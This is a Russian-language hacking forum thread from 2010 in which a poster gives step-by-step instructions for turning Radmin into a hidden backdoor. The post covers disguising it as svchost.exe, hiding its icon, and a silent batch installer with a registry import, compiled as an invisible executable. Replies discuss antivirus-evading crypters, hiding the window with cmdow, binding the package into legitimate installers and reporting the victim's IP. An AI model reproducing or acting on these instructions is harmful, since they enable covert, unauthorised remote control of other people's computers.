[Статья] Делаем скрытого Radmin'а.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[Статья] Делаем скрытого Radmin'а. - 2010-10-16 11:28:41.733333
|
|
|
Oxygen
Сообщений: 40
Оценки: 0
Присоединился: 2010-03-29 20:55:53.723333
|
Сижу, жду КВН, решил написать статью чтобы не терять время зря.
Меньше слов, больше дела!
Понадобятся:
-Radmin 2.x версии
-Resourse Hacker или Restorator
-Редактор реестра с возможностью сохранения ключей в файл формата *.reg. Я использовал RegWorks
-Bat To Exe Converter
1.Устанавливаем Radmin'а в отдельную папочку.
2.Заходим в настройки Radmin Servera'а, выставляем всё как нам нужно (советую стандартный порт сменить!),
также не забудте поставить галочку на "Убрать иконку".
3.Открываем редактор реестра, ищем и сохраняем следующую ветвь (или параметр, как их там):
Назовём ключ settings.reg открываем его любым текстовым редактором и добавляем:
"Data"=hex:01,f6,99,b0,57,5c,13,80,18,6f,f3,fc,68,83,8e,bf,ca,4a,9c,5e,cc,f9,8e,7c,31,72,
ae,28,31,5e,99,0b,9f,a4,89,61,fc,0c,e3,47,50,e3,06,08,f0,55,2b,80,b3,d4,c0,a8,15,36,27,f0,5f,8e,f7,b0,f5,b0,4b,db
Это регистрация, без неё через 30 дней сервер перестанет работать.
4.Теперь заходим в папку с Radmin'ом и удаляем всё кроме: r_server.exe и AdmDll.dll ,
также можно оставить raddrv.dll -это драйвер видеозахвата и без него Radmin не сможет рабоать в режимах "Управление" и "Просмотр". Переименовываем Radmin Server во что-нибудь неприметное, например в svchost.exe .
5.Открываем r_server.exe Restorator'ом или Resourse Hackero'ом и удаляем всё кроме: "String Table" (по-русски "Строка") и "RCData".
6.Теперь пишем bat'ник для установки всего этого дела:
1)Копируем файлики в system32:
copy /y "AdmDll.dll" "%SYSTEMROOT%/system32/AdmDll.dll"
copy /y "raddrv.dll" "%SYSTEMROOT%/system32/raddrv.dll"
Пояснения:
Я указал полный путь к Regedit т.к. на моём компе команда regedit не канает.
Ключ /s устанавливает ключ реестра без вопроса об установке.
3)Устанавливаем Radmin Server в автозагрузку и запускаем:
"%SYSTEMROOT%/svchost.exe" /start
В итоге получается вот что:
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "AdmDll.dll" "%SYSTEMROOT%/AdmDll.dll"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
%systemroot%\system32\regedt32.exe /s settings.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
exit
Но батник будет палится чёрным окном при работе, конечно, можно заюзать cmdow, но мы поступим умнее:
Сконвертируем наш bat'ник программой Bat To Exe Converter , в настройках программы ставим отметку на "Invisible application" и компилим. Всё, теперь bat'ник будет работать скрытно.
Вот в принципе и всё, наш скрытый Ramin готов.
Но не решены следующие проблемы:
1.Желательно скучковать всё это дело каким-нибудь джойнером, только вот в чём загвоздка-джойнер будет запускать всё,
что запускается. Поэтому settings.reg выдаст нас. Как вариант-можно settings.reg передавать одним файлом, но это палевно.
2.Как узнать IP. Эту проблему я решил, юзаю для этих целей IpBot Скачать
З.Ы.:Если что не понятно-спрашивайте, постараюсь помочь. Также интересно послушать ваши идеи и предложения по данной теме.
З.Ы.:Если нужно добавить ссылки на софт-скажите куда лучше закачать, добавлю.
|
|
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-17 12:36:22.383333
|
|
|
Rezz
Сообщений: 307
Оценки: 0
Присоединился: 2009-09-04 11:21:33.213333
|
Bat To Exe Converter палится
Добась пару строк про крипторы
|
|
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-17 17:49:01.596666
|
|
|
Oxygen
Сообщений: 40
Оценки: 0
Присоединился: 2010-03-29 20:55:53.723333
|
К сожалению опробовав множество паблик крипторов-не нашёл ни одного не паляшегося антвирусами, а покупать приватные бюджет не позволяет. Окно bat'ника можно скрыть утилитой cmdow.exe, в батнике пишем: cmdow @ /HID , при этом cmdow должна быть на компе куда закидываем радмина. Как её туда закинуть-думайте сами =)
|
|
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-19 22:37:19.390000
|
|
|
DonKenny1
Сообщений: 77
Оценки: 0
Присоединился: 2010-08-22 15:22:40.673333
|
А не мог бы ты, объяснить подробнее как это всё склеить с какой нить прогой (например setup QIP) или ещё чем нибудь
|
|
|
|
|
RE: [Статья] Делаем скрытого Radmin'а. - 2010-10-20 07:51:06.066666
|
|
|
misterz09
Сообщений: 447
Оценки: 0
Присоединился: 2009-10-24 19:43:38.336666
|
Отписал вам в пм, очень нужна ваша помощь)
|
|
|
|
|
|
